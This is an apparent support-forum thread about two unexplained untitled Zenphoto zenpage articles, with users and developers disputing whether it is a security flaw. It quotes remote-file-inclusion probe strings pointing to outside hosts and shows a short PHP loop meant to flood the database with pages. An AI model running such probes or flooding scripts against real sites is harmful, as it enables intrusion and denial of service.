Possible SQL injection??

code

I have two articles in zenpage that I did not create. Both are Untitled.

When I edit them it shows under "Title Link" the following:
`//?p=http://soccerbetting.me.uk/images/safe1.txt???`

And the other shows this:
`//?p=http://www.vihorlat.lietame.sk/photos/galeria/safe1.txt???`

Edit: Running this person: version 1.2.3 [3673]

acrylian

This is a bug and is not a real security issue because it always creates empty pages. Besides the fact that 1.2.3 is not the current version you need to update to the latest nightly.

NunyaBiz

To say it's not a security issue isn't exactly accurate. Whether it's a bug or not seems irrelevant. It is indeed a security issue when data can be inserted into to the database freely. Even though the pages are empty, an attacker can literally swamp the database with these empty pages in what would amount to a denial of service attack.

If it hasn't already been, the official release should be patched and a public warning should be issued about this vulnerability. You should not expect everyone to automatically download the nightly build, especially considering the nightly build is usually unstable. Although the nightly build will fix the bug, the version on the front page of your website is the one everyone is going to install first.

sbillard

1. The attacker can create exactly two records, one for `pages` and one for `news`. Hardly "Swamping" the database.

2. If it really is a concern to you, why have you not installed at least the 1.2.4 release or better the nightly builds?

3. What is more 'public' than this forum?

NunyaBiz

All an attacker has to do is make 1 simple change to the URL address to insert a new page, which is a simple task to automate. Something like ...
`
<?php
for($i=0;$i<10000000000000000000000;$i++){
$attack = @file('index.php?p=pages&title=' . $i);
}
?>
`
There you have 10000000000000000000000 new records in the database.

sbillard

Not if you are running the current release. If you won't run the currernt release, you are on your own.